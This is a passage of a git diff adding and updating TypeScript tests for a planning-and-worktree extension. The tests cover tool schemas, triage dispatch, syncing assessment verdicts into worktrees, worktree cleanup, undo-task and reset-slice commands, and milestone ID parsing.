+        verify: "npm test",
+        inputs: [],
+        expectedOutput: ["src/x.ts"],
+      },
+    ],
+  };
+
+  const errors = [...Value.Errors(tool.parameters, minimalParams)];
+  assert.strictEqual(errors.length, 0, `Minimal params should validate but got errors: ${errors.map(e => `${e.path}: ${e.message}`).join(", ")}`);
+});
+
+// ─── Required param count ceiling ────────────────────────────────────────────
+
+test("no planning/completion tool requires more than 10 top-level params", () => {
+  const heavyTools = [
+    "gsd_slice_complete",
+    "gsd_plan_milestone",
+    "gsd_task_complete",
+    "gsd_complete_milestone",
+    "gsd_plan_slice",
+  ];
+
+  for (const name of heavyTools) {
+    const tool = getTool(name);
+    assert.ok(tool, `${name} must be registered`);
+    const required = getRequiredProps(tool);
+    assert.ok(
+      required.length <= 10,
+      `${name} has ${required.length} required params (max 10) — required: ${required.join(", ")}`,
+    );
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/triage-dispatch.test.ts b/src/resources/extensions/gsd/tests/triage-dispatch.test.ts
index 34fd149de..025f99677 100644
--- a/src/resources/extensions/gsd/tests/triage-dispatch.test.ts
+++ b/src/resources/extensions/gsd/tests/triage-dispatch.test.ts
@@ -119,7 +119,7 @@ test("dispatch: triage dispatch keeps the loop in continue mode", () => {
     postUnitSrc.indexOf("// ── Quick-task dispatch"),
   );
   assert.ok(
-    triageBlock.includes('return "continue"'),
+    triageBlock.includes('return "continue"') || triageBlock.includes("return enqueueSidecar("),
     "triage dispatch should return 'continue' after enqueuing sidecar work",
   );
 });
@@ -320,7 +320,7 @@ test("dispatch: quick-task dispatch keeps the loop in continue mode", () => {
     postUnitSrc.indexOf("if (s.stepMode)"),
   );
   assert.ok(
-    quickTaskSection.includes('return "continue"'),
+    quickTaskSection.includes('return "continue"') || quickTaskSection.includes("return enqueueSidecar("),
     "quick-task dispatch should return 'continue' after enqueuing sidecar work",
   );
 });
diff --git a/src/resources/extensions/gsd/tests/triage-resolution.test.ts b/src/resources/extensions/gsd/tests/triage-resolution.test.ts
index 496685732..0decf9e6f 100644
--- a/src/resources/extensions/gsd/tests/triage-resolution.test.ts
+++ b/src/resources/extensions/gsd/tests/triage-resolution.test.ts
@@ -212,6 +212,14 @@ test("resolution: buildQuickTaskPrompt includes capture text and ID", () => {
   assert.ok(prompt.includes("add retry logic to OAuth"), "should include capture text");
   assert.ok(prompt.includes("Quick Task"), "should have Quick Task header");
   assert.ok(prompt.includes("Do NOT modify"), "should warn about plan files");
+  assert.ok(
+    prompt.includes("Verify the issue still exists"),
+    "should instruct agent to verify issue still exists (#2872)",
+  );
+  assert.ok(
+    prompt.includes("Already resolved"),
+    "should instruct agent to report already resolved if fixed (#2872)",
+  );
 });
 
 // ─── markCaptureExecuted ─────────────────────────────────────────────────────
@@ -379,7 +387,8 @@ test("resolution: executeTriageResolutions handles mixed classifications", () =>
     assert.strictEqual(result.injected, 1, "should inject 1 task");
     assert.strictEqual(result.replanned, 0);
     assert.strictEqual(result.quickTasks.length, 1, "should queue 1 quick-task");
-    assert.strictEqual(result.actions.length, 2, "should have 2 action entries (note/defer excluded)");
+    // inject + quick-task + note acknowledged = 3 actions (defer still excluded)
+    assert.strictEqual(result.actions.length, 3, "should have 3 action entries (defer excluded, note now included)");
   } finally {
     rmSync(tmp, { recursive: true, force: true });
   }
diff --git a/src/resources/extensions/gsd/tests/uat-stuck-loop-orphaned-worktree.test.ts b/src/resources/extensions/gsd/tests/uat-stuck-loop-orphaned-worktree.test.ts
new file mode 100644
index 000000000..44ae79661
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/uat-stuck-loop-orphaned-worktree.test.ts
@@ -0,0 +1,289 @@
+/**
+ * uat-stuck-loop-orphaned-worktree.test.ts — Regression tests for #2821.
+ *
+ * Reproduces two cascading bugs:
+ *
+ * Bug 1 — UAT stuck-loop: syncProjectRootToWorktree uses force:false for
+ *   milestone files. When the project root has an ASSESSMENT with a verdict
+ *   but the worktree has a stale/empty ASSESSMENT (or none at all after DB
+ *   rebuild), the verdict is NOT synced into the worktree. checkNeedsRunUat
+ *   finds no verdict → re-dispatches run-uat indefinitely.
+ *
+ * Bug 2 — Orphaned worktree: removeWorktree silently swallows failures when
+ *   git worktree remove fails (untracked files, CWD inside worktree, etc.).
+ *   The worktree directory and branch persist on disk after teardown.
+ *   teardownAutoWorktree has a fallback rmSync but it also fails when the
+ *   git internal .git/worktrees/<name> directory holds a lock.
+ */
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  readFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+
+import { syncProjectRootToWorktree } from "../auto-worktree.ts";
+import {
+  createWorktree,
+  removeWorktree,
+  worktreePath,
+} from "../worktree-manager.ts";
+
+function git(args: string[], cwd: string): string {
+  return execFileSync("git", args, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+function makeBaseRepo(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-2821-"));
+  git(["init", "-b", "main"], base);
+  git(["config", "user.name", "Test"], base);
+  git(["config", "user.email", "test@test.com"], base);
+  writeFileSync(join(base, "README.md"), "# test\n");
+  mkdirSync(join(base, ".gsd", "milestones", "M011"), { recursive: true });
+  git(["add", "."], base);
+  git(["commit", "-m", "init"], base);
+  return base;
+}
+
+// ─── Bug 1: ASSESSMENT force-sync ─────────────────────────────────────────
+
+describe("#2821 Bug 1 — ASSESSMENT file force-synced on resume", () => {
+  let mainBase: string;
+  let wtBase: string;
+
+  beforeEach(() => {
+    mainBase = mkdtempSync(join(tmpdir(), "gsd-2821-main-"));
+    wtBase = mkdtempSync(join(tmpdir(), "gsd-2821-wt-"));
+    mkdirSync(join(mainBase, ".gsd", "milestones", "M011", "slices", "S01"), {
+      recursive: true,
+    });
+    mkdirSync(join(wtBase, ".gsd", "milestones", "M011", "slices", "S01"), {
+      recursive: true,
+    });
+  });
+
+  afterEach(() => {
+    rmSync(mainBase, { recursive: true, force: true });
+    rmSync(wtBase, { recursive: true, force: true });
+  });
+
+  test("force-syncs ASSESSMENT with verdict from project root into worktree when worktree copy has no verdict", () => {
+    // Project root has ASSESSMENT with a PASS verdict (written by run-uat, synced by post-unit)
+    const prAssessment = join(
+      mainBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    writeFileSync(
+      prAssessment,
+      "---\nverdict: pass\n---\n# S01 Assessment\nAll tests pass.\n",
+    );
+
+    // Worktree has a stale ASSESSMENT with FAIL verdict (from the initial run-uat execution)
+    const wtAssessment = join(
+      wtBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    writeFileSync(
+      wtAssessment,
+      "---\nverdict: fail\n---\n# S01 Assessment\nSome tests fail.\n",
+    );
+
+    syncProjectRootToWorktree(mainBase, wtBase, "M011");
+
+    // The worktree ASSESSMENT must now have the project root's PASS verdict
+    const content = readFileSync(wtAssessment, "utf-8");
+    assert.ok(
+      content.includes("verdict: pass"),
+      `Expected worktree ASSESSMENT to have verdict:pass after sync, got: ${content.slice(0, 100)}`,
+    );
+  });
+
+  test("force-syncs ASSESSMENT from project root when worktree has no ASSESSMENT at all", () => {
+    // Project root has ASSESSMENT with verdict
+    const prAssessment = join(
+      mainBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    writeFileSync(
+      prAssessment,
+      "---\nverdict: pass\n---\n# S01 Assessment\n",
+    );
+
+    // Worktree has NO ASSESSMENT (deleted during DB rebuild)
+    // — file simply doesn't exist
+
+    syncProjectRootToWorktree(mainBase, wtBase, "M011");
+
+    const wtAssessment = join(
+      wtBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    assert.ok(
+      existsSync(wtAssessment),
+      "ASSESSMENT should be copied to worktree when missing",
+    );
+    const content = readFileSync(wtAssessment, "utf-8");
+    assert.ok(
+      content.includes("verdict: pass"),
+      `Synced ASSESSMENT should contain verdict:pass, got: ${content.slice(0, 100)}`,
+    );
+  });
+
+  test("does NOT overwrite worktree ASSESSMENT when project root has no verdict", () => {
+    // Project root has ASSESSMENT without verdict (incomplete)
+    const prAssessment = join(
+      mainBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    writeFileSync(prAssessment, "# S01 Assessment\nIn progress...\n");
+
+    // Worktree has ASSESSMENT with verdict:fail
+    const wtAssessment = join(
+      wtBase,
+      ".gsd",
+      "milestones",
+      "M011",
+      "slices",
+      "S01",
+      "S01-ASSESSMENT.md",
+    );
+    writeFileSync(
+      wtAssessment,
+      "---\nverdict: fail\n---\n# S01 Assessment\nSome tests fail.\n",
+    );
+
+    syncProjectRootToWorktree(mainBase, wtBase, "M011");
+
+    // Worktree copy should NOT be overwritten by the verdictless project root copy
+    const content = readFileSync(wtAssessment, "utf-8");
+    assert.ok(
+      content.includes("verdict: fail"),
+      `Worktree ASSESSMENT should keep verdict:fail when project root has no verdict, got: ${content.slice(0, 100)}`,
+    );
+  });
+});
+
+// ─── Bug 2: Orphaned worktree cleanup ─────────────────────────────────────
+
+describe("#2821 Bug 2 — removeWorktree cleans up despite untracked files", () => {
+  let base: string;
+
+  beforeEach(() => {
+    base = makeBaseRepo();
+  });
+
+  afterEach(() => {
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  test("removes worktree directory even when it contains untracked files", () => {
+    const info = createWorktree(base, "M011", {
+      branch: "milestone/M011",
+    });
+
+    // Simulate run-uat writing untracked files (S01-UAT-RESULT.md, ASSESSMENT)
+    mkdirSync(
+      join(info.path, ".gsd", "milestones", "M011", "slices", "S01"),
+      { recursive: true },
+    );
+    writeFileSync(
+      join(
+        info.path,
+        ".gsd",
+        "milestones",
+        "M011",
+        "slices",
+        "S01",
+        "S01-UAT-RESULT.md",
+      ),
+      "# UAT Result\nverdict: fail\n",
+    );
+    writeFileSync(
+      join(
+        info.path,
+        ".gsd",
+        "milestones",
+        "M011",
+        "slices",
+        "S01",
+        "S01-ASSESSMENT.md",
+      ),
+      "---\nverdict: fail\n---\n# Assessment\n",
+    );
+
+    removeWorktree(base, "M011", {
+      branch: "milestone/M011",
+      deleteBranch: true,
+      force: true,
+    });
+
+    const wtDir = worktreePath(base, "M011");
+    assert.ok(
+      !existsSync(wtDir),
+      `Worktree directory should be removed after teardown, but still exists at ${wtDir}`,
+    );
+  });
+
+  test("removes git internal worktree metadata after filesystem removal", () => {
+    createWorktree(base, "M011", {
+      branch: "milestone/M011",
+    });
+
+    removeWorktree(base, "M011", {
+      branch: "milestone/M011",
+      deleteBranch: true,
+      force: true,
+    });
+
+    // The git internal worktree directory should be cleaned up
+    const gitInternalWorktreeDir = join(base, ".git", "worktrees", "M011");
+    assert.ok(
+      !existsSync(gitInternalWorktreeDir),
+      `Git internal worktree dir should be removed: ${gitInternalWorktreeDir}`,
+    );
+
+    // The branch should be deleted
+    const branches = git(["branch"], base);
+    assert.ok(
+      !branches.includes("milestone/M011"),
+      "milestone/M011 branch should be deleted after removeWorktree",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/undo.test.ts b/src/resources/extensions/gsd/tests/undo.test.ts
index fee95171b..2504abbbf 100644
--- a/src/resources/extensions/gsd/tests/undo.test.ts
+++ b/src/resources/extensions/gsd/tests/undo.test.ts
@@ -8,8 +8,21 @@ import {
   extractCommitShas,
   findCommitsForUnit,
   handleUndo,
+  handleUndoTask,
+  handleResetSlice,
   uncheckTaskInPlan,
-} from "../undo.js";
+} from "../undo.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getTask,
+  getSlice,
+} from "../gsd-db.ts";
+import { invalidateAllCaches } from "../cache.ts";
+import { existsSync } from "node:fs";
 
 function makeTempDir(prefix: string): string {
   return mkdtempSync(join(tmpdir(), `${prefix}-`));
@@ -140,3 +153,310 @@ test("extractCommitShas ignores malformed commit tokens", () => {
 
   assert.deepEqual(extractCommitShas(content), ["1234567"]);
 });
+
+// ─── handleUndoTask tests ────────────────────────────────────────────────────
+
+function makeCtx(): { notifications: Array<{ message: string; level: string }>; ctx: any } {
+  const notifications: Array<{ message: string; level: string }> = [];
+  const ctx = {
+    ui: {
+      notify(message: string, level: string) {
+        notifications.push({ message, level });
+      },
+    },
+  };
+  return { notifications, ctx };
+}
+
+function setupTaskFixture(base: string): void {
+  // Create milestone/slice/task directory structure
+  const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+
+  // Write plan file with checked task
+  writeFileSync(
+    join(sliceDir, "S01-PLAN.md"),
+    [
+      "# S01: Test Slice",
+      "",
+      "## Tasks",
+      "",
+      "- [x] **T01: First task** `est:30m`",
+      "- [ ] **T02: Second task** `est:30m`",
+    ].join("\n"),
+    "utf-8",
+  );
+
+  // Write task summary file
+  writeFileSync(
+    join(tasksDir, "T01-SUMMARY.md"),
+    "# T01 Summary\nDone.",
+    "utf-8",
+  );
+
+  // Set up DB
+  openDatabase(":memory:");
+  insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Test Slice", status: "active", risk: "low", depends: [] });
+  insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "First task", status: "complete" });
+  insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Second task", status: "pending" });
+  invalidateAllCaches();
+}
+
+test("handleUndoTask without args shows usage", async () => {
+  const { notifications, ctx } = makeCtx();
+  const base = makeTempDir("gsd-undo-task-usage");
+  try {
+    await handleUndoTask("", ctx, {} as any, base);
+    assert.equal(notifications.length, 1);
+    assert.equal(notifications[0]?.level, "warning");
+    assert.match(notifications[0]?.message ?? "", /Usage:/);
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleUndoTask without --force shows confirmation", async () => {
+  const base = makeTempDir("gsd-undo-task-confirm");
+  try {
+    setupTaskFixture(base);
+    const { notifications, ctx } = makeCtx();
+    await handleUndoTask("M001/S01/T01", ctx, {} as any, base);
+    assert.equal(notifications.length, 1);
+    assert.equal(notifications[0]?.level, "warning");
+    assert.match(notifications[0]?.message ?? "", /--force to confirm/);
+    // Verify state was NOT modified
+    const task = getTask("M001", "S01", "T01");
+    assert.equal(task?.status, "complete");
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleUndoTask with --force resets task and re-renders plan", async () => {
+  const base = makeTempDir("gsd-undo-task-force");
+  try {
+    setupTaskFixture(base);
+    const { notifications, ctx } = makeCtx();
+    await handleUndoTask("M001/S01/T01 --force", ctx, {} as any, base);
+
+    // DB status reset
+    const task = getTask("M001", "S01", "T01");
+    assert.equal(task?.status, "pending");
+
+    // Summary file deleted
+    const summaryPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
+    assert.equal(existsSync(summaryPath), false);
+
+    // Plan checkbox unchecked
+    const planContent = readFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md"),
+      "utf-8",
+    );
+    assert.match(planContent, /\[ \] \*\*T01:/);
+
+    // Success notification
+    assert.equal(notifications[0]?.level, "success");
+    assert.match(notifications[0]?.message ?? "", /Reset task M001\/S01\/T01/);
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleUndoTask with non-existent task returns error", async () => {
+  const base = makeTempDir("gsd-undo-task-notfound");
+  try {
+    openDatabase(":memory:");
+    insertMilestone({ id: "M001", title: "Test", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Test", status: "active", risk: "low", depends: [] });
+
+    const { notifications, ctx } = makeCtx();
+    await handleUndoTask("M001/S01/T99 --force", ctx, {} as any, base);
+    assert.equal(notifications[0]?.level, "error");
+    assert.match(notifications[0]?.message ?? "", /not found/);
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleUndoTask accepts partial ID (T01) and resolves from state", async () => {
+  const base = makeTempDir("gsd-undo-task-partial");
+  try {
+    setupTaskFixture(base);
+
+    // Create STATE.md so deriveState can resolve the active milestone/slice
+    mkdirSync(join(base, ".gsd"), { recursive: true });
+    writeFileSync(
+      join(base, ".gsd", "STATE.md"),
+      [
+        "# GSD State",
+        "",
+        "- Phase: executing",
+        "- Active Milestone: M001",
+        "- Active Slice: S01",
+        "- Active Task: T01",
+      ].join("\n"),
+      "utf-8",
+    );
+
+    const { notifications, ctx } = makeCtx();
+    await handleUndoTask("T01 --force", ctx, {} as any, base);
+
+    const task = getTask("M001", "S01", "T01");
+    assert.equal(task?.status, "pending");
+    assert.equal(notifications[0]?.level, "success");
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+// ─── handleResetSlice tests ──────────────────────────────────────────────────
+
+function setupSliceFixture(base: string): void {
+  const mDir = join(base, ".gsd", "milestones", "M001");
+  const sliceDir = join(mDir, "slices", "S01");
+  const tasksDir = join(sliceDir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+
+  // Write roadmap file
+  writeFileSync(
+    join(mDir, "M001-ROADMAP.md"),
+    [
+      "# Roadmap",
+      "",
+      "## Slices",
+      "",
+      "- [x] **S01: Test Slice** `risk:low` `depends:[]`",
+      "- [ ] **S02: Next Slice** `risk:low` `depends:[S01]`",
+    ].join("\n"),
+    "utf-8",
+  );
+
+  // Write plan file
+  writeFileSync(
+    join(sliceDir, "S01-PLAN.md"),
+    [
+      "# S01: Test Slice",
+      "",
+      "## Tasks",
+      "",
+      "- [x] **T01: First task** `est:30m`",
+      "- [x] **T02: Second task** `est:30m`",
+    ].join("\n"),
+    "utf-8",
+  );
+
+  // Write task summaries
+  writeFileSync(join(tasksDir, "T01-SUMMARY.md"), "# T01 Summary\nDone.", "utf-8");
+  writeFileSync(join(tasksDir, "T02-SUMMARY.md"), "# T02 Summary\nDone.", "utf-8");
+
+  // Write slice summary and UAT
+  writeFileSync(join(sliceDir, "S01-SUMMARY.md"), "# Slice Summary\nDone.", "utf-8");
+  writeFileSync(join(sliceDir, "S01-UAT.md"), "# UAT\nPassed.", "utf-8");
+
+  // Set up DB
+  openDatabase(":memory:");
+  insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+  insertSlice({ id: "S01", milestoneId: "M001", title: "Test Slice", status: "complete", risk: "low", depends: [] });
+  insertSlice({ id: "S02", milestoneId: "M001", title: "Next Slice", status: "pending", risk: "low", depends: ["S01"] });
+  insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "First task", status: "complete" });
+  insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "Second task", status: "complete" });
+  invalidateAllCaches();
+}
+
+test("handleResetSlice without args shows usage", async () => {
+  const { notifications, ctx } = makeCtx();
+  const base = makeTempDir("gsd-reset-slice-usage");
+  try {
+    await handleResetSlice("", ctx, {} as any, base);
+    assert.equal(notifications.length, 1);
+    assert.equal(notifications[0]?.level, "warning");
+    assert.match(notifications[0]?.message ?? "", /Usage:/);
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleResetSlice without --force shows confirmation", async () => {
+  const base = makeTempDir("gsd-reset-slice-confirm");
+  try {
+    setupSliceFixture(base);
+    const { notifications, ctx } = makeCtx();
+    await handleResetSlice("M001/S01", ctx, {} as any, base);
+    assert.equal(notifications[0]?.level, "warning");
+    assert.match(notifications[0]?.message ?? "", /--force to confirm/);
+    // State not modified
+    const slice = getSlice("M001", "S01");
+    assert.equal(slice?.status, "complete");
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleResetSlice with --force resets slice and all tasks", async () => {
+  const base = makeTempDir("gsd-reset-slice-force");
+  try {
+    setupSliceFixture(base);
+    const { notifications, ctx } = makeCtx();
+    await handleResetSlice("M001/S01 --force", ctx, {} as any, base);
+
+    // DB status reset
+    const slice = getSlice("M001", "S01");
+    assert.equal(slice?.status, "active");
+    const t1 = getTask("M001", "S01", "T01");
+    assert.equal(t1?.status, "pending");
+    const t2 = getTask("M001", "S01", "T02");
+    assert.equal(t2?.status, "pending");
+
+    // Task summaries deleted
+    const tasksDir = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks");
+    assert.equal(existsSync(join(tasksDir, "T01-SUMMARY.md")), false);
+    assert.equal(existsSync(join(tasksDir, "T02-SUMMARY.md")), false);
+
+    // Slice summary and UAT deleted
+    const sliceDir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+    assert.equal(existsSync(join(sliceDir, "S01-SUMMARY.md")), false);
+    assert.equal(existsSync(join(sliceDir, "S01-UAT.md")), false);
+
+    // Plan checkboxes unchecked
+    const planContent = readFileSync(join(sliceDir, "S01-PLAN.md"), "utf-8");
+    assert.match(planContent, /\[ \] \*\*T01:/);
+    assert.match(planContent, /\[ \] \*\*T02:/);
+
+    // Roadmap checkbox unchecked
+    const roadmapContent = readFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+      "utf-8",
+    );
+    assert.match(roadmapContent, /\[ \] \*\*S01:/);
+
+    // Success notification
+    assert.equal(notifications[0]?.level, "success");
+    assert.match(notifications[0]?.message ?? "", /Reset slice M001\/S01/);
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("handleResetSlice with non-existent slice returns error", async () => {
+  const base = makeTempDir("gsd-reset-slice-notfound");
+  try {
+    openDatabase(":memory:");
+    insertMilestone({ id: "M001", title: "Test", status: "active" });
+
+    const { notifications, ctx } = makeCtx();
+    await handleResetSlice("M001/S99 --force", ctx, {} as any, base);
+    assert.equal(notifications[0]?.level, "error");
+    assert.match(notifications[0]?.message ?? "", /not found/);
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/unique-milestone-ids.test.ts b/src/resources/extensions/gsd/tests/unique-milestone-ids.test.ts
index 859095c10..9e1875bff 100644
--- a/src/resources/extensions/gsd/tests/unique-milestone-ids.test.ts
+++ b/src/resources/extensions/gsd/tests/unique-milestone-ids.test.ts
@@ -22,72 +22,72 @@ import {
 
 import { renderPreferencesForSystemPrompt } from '../preferences.ts';
 import type { GSDPreferences } from '../preferences.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
 // ─── Tests ─────────────────────────────────────────────────────────────────
 
-async function main(): Promise<void> {
+describe('unique-milestone-ids', async () => {
   console.log('unique-milestone-ids tests');
 
   // (a) MILESTONE_ID_RE
   {
     console.log('  (a) MILESTONE_ID_RE');
     // Should match
-    assertTrue(MILESTONE_ID_RE.test('M001'), 'matches M001');
-    assertTrue(MILESTONE_ID_RE.test('M999'), 'matches M999');
-    assertTrue(MILESTONE_ID_RE.test('M001-abc123'), 'matches M001-abc123');
-    assertTrue(MILESTONE_ID_RE.test('M042-z9a8b7'), 'matches M042-z9a8b7');
+    assert.ok(MILESTONE_ID_RE.test('M001'), 'matches M001');
+    assert.ok(MILESTONE_ID_RE.test('M999'), 'matches M999');
+    assert.ok(MILESTONE_ID_RE.test('M001-abc123'), 'matches M001-abc123');
+    assert.ok(MILESTONE_ID_RE.test('M042-z9a8b7'), 'matches M042-z9a8b7');
 
     // Should reject
-    assertTrue(!MILESTONE_ID_RE.test('M1'), 'rejects M1 (too few digits)');
-    assertTrue(!MILESTONE_ID_RE.test('M0001'), 'rejects M0001 (too many digits)');
-    assertTrue(!MILESTONE_ID_RE.test('M001-ABCDEF'), 'rejects M001-ABCDEF (uppercase prefix)');
-    assertTrue(!MILESTONE_ID_RE.test('M001-short'), 'rejects M001-short (5-char prefix)');
-    assertTrue(!MILESTONE_ID_RE.test('M001-toolong1'), 'rejects M001-toolong1 (>6-char prefix)');
-    assertTrue(!MILESTONE_ID_RE.test('IM001'), 'rejects IM001 (prefix before M)');
-    assertTrue(!MILESTONE_ID_RE.test(''), 'rejects empty string');
-    assertTrue(!MILESTONE_ID_RE.test('M001extra'), 'rejects M001extra (trailing chars)');
-    assertTrue(!MILESTONE_ID_RE.test('notes'), 'rejects non-milestone string');
+    assert.ok(!MILESTONE_ID_RE.test('M1'), 'rejects M1 (too few digits)');
+    assert.ok(!MILESTONE_ID_RE.test('M0001'), 'rejects M0001 (too many digits)');
+    assert.ok(!MILESTONE_ID_RE.test('M001-ABCDEF'), 'rejects M001-ABCDEF (uppercase prefix)');
+    assert.ok(!MILESTONE_ID_RE.test('M001-short'), 'rejects M001-short (5-char prefix)');
+    assert.ok(!MILESTONE_ID_RE.test('M001-toolong1'), 'rejects M001-toolong1 (>6-char prefix)');
+    assert.ok(!MILESTONE_ID_RE.test('IM001'), 'rejects IM001 (prefix before M)');
+    assert.ok(!MILESTONE_ID_RE.test(''), 'rejects empty string');
+    assert.ok(!MILESTONE_ID_RE.test('M001extra'), 'rejects M001extra (trailing chars)');
+    assert.ok(!MILESTONE_ID_RE.test('notes'), 'rejects non-milestone string');
   }
 
   // (b) extractMilestoneSeq
   {
     console.log('  (b) extractMilestoneSeq');
     // Old format
-    assertEq(extractMilestoneSeq('M001'), 1, 'M001 → 1');
-    assertEq(extractMilestoneSeq('M042'), 42, 'M042 → 42');
-    assertEq(extractMilestoneSeq('M999'), 999, 'M999 → 999');
+    assert.deepStrictEqual(extractMilestoneSeq('M001'), 1, 'M001 → 1');
+    assert.deepStrictEqual(extractMilestoneSeq('M042'), 42, 'M042 → 42');
+    assert.deepStrictEqual(extractMilestoneSeq('M999'), 999, 'M999 → 999');
 
     // Unique format
-    assertEq(extractMilestoneSeq('M001-abc123'), 1, 'M001-abc123 → 1');
-    assertEq(extractMilestoneSeq('M042-z9a8b7'), 42, 'M042-z9a8b7 → 42');
+    assert.deepStrictEqual(extractMilestoneSeq('M001-abc123'), 1, 'M001-abc123 → 1');
+    assert.deepStrictEqual(extractMilestoneSeq('M042-z9a8b7'), 42, 'M042-z9a8b7 → 42');
 
     // Invalid → 0
-    assertEq(extractMilestoneSeq(''), 0, 'empty → 0');
-    assertEq(extractMilestoneSeq('notes'), 0, 'notes → 0');
-    assertEq(extractMilestoneSeq('M1'), 0, 'M1 → 0');
-    assertEq(extractMilestoneSeq('.DS_Store'), 0, '.DS_Store → 0');
-    assertEq(extractMilestoneSeq('M-ABC-001'), 0, 'M-ABC-001 (old format) → 0');
+    assert.deepStrictEqual(extractMilestoneSeq(''), 0, 'empty → 0');
+    assert.deepStrictEqual(extractMilestoneSeq('notes'), 0, 'notes → 0');
+    assert.deepStrictEqual(extractMilestoneSeq('M1'), 0, 'M1 → 0');
+    assert.deepStrictEqual(extractMilestoneSeq('.DS_Store'), 0, '.DS_Store → 0');
+    assert.deepStrictEqual(extractMilestoneSeq('M-ABC-001'), 0, 'M-ABC-001 (old format) → 0');
   }
 
   // (c) parseMilestoneId
   {
     console.log('  (c) parseMilestoneId');
     // Old format — no suffix
-    assertEq(parseMilestoneId('M001'), { num: 1 }, 'M001 → { num: 1 }');
-    assertEq(parseMilestoneId('M042'), { num: 42 }, 'M042 → { num: 42 }');
+    assert.deepStrictEqual(parseMilestoneId('M001'), { num: 1 }, 'M001 → { num: 1 }');
+    assert.deepStrictEqual(parseMilestoneId('M042'), { num: 42 }, 'M042 → { num: 42 }');
 
     // Unique format — with suffix
-    assertEq(parseMilestoneId('M001-abc123'), { suffix: 'abc123', num: 1 }, 'M001-abc123 → { suffix, num }');
-    assertEq(parseMilestoneId('M042-z9a8b7'), { suffix: 'z9a8b7', num: 42 }, 'M042-z9a8b7 → { suffix, num }');
+    assert.deepStrictEqual(parseMilestoneId('M001-abc123'), { suffix: 'abc123', num: 1 }, 'M001-abc123 → { suffix, num }');
+    assert.deepStrictEqual(parseMilestoneId('M042-z9a8b7'), { suffix: 'z9a8b7', num: 42 }, 'M042-z9a8b7 → { suffix, num }');
 
     // Invalid → { num: 0 }
-    assertEq(parseMilestoneId(''), { num: 0 }, 'empty → { num: 0 }');
-    assertEq(parseMilestoneId('notes'), { num: 0 }, 'notes → { num: 0 }');
-    assertEq(parseMilestoneId('M001-ABCDEF'), { num: 0 }, 'uppercase suffix → { num: 0 }');
-    assertEq(parseMilestoneId('M1'), { num: 0 }, 'M1 → { num: 0 }');
+    assert.deepStrictEqual(parseMilestoneId(''), { num: 0 }, 'empty → { num: 0 }');
+    assert.deepStrictEqual(parseMilestoneId('notes'), { num: 0 }, 'notes → { num: 0 }');
+    assert.deepStrictEqual(parseMilestoneId('M001-ABCDEF'), { num: 0 }, 'uppercase suffix → { num: 0 }');
+    assert.deepStrictEqual(parseMilestoneId('M1'), { num: 0 }, 'M1 → { num: 0 }');
   }
 
   // (d) milestoneIdSort
@@ -95,81 +95,81 @@ async function main(): Promise<void> {
     console.log('  (d) milestoneIdSort');
     const mixed = ['M003-abc123', 'M001', 'M002-z9a8b7'];
     const sorted = [...mixed].sort(milestoneIdSort);
-    assertEq(sorted, ['M001', 'M002-z9a8b7', 'M003-abc123'], 'sorts mixed IDs by sequence number');
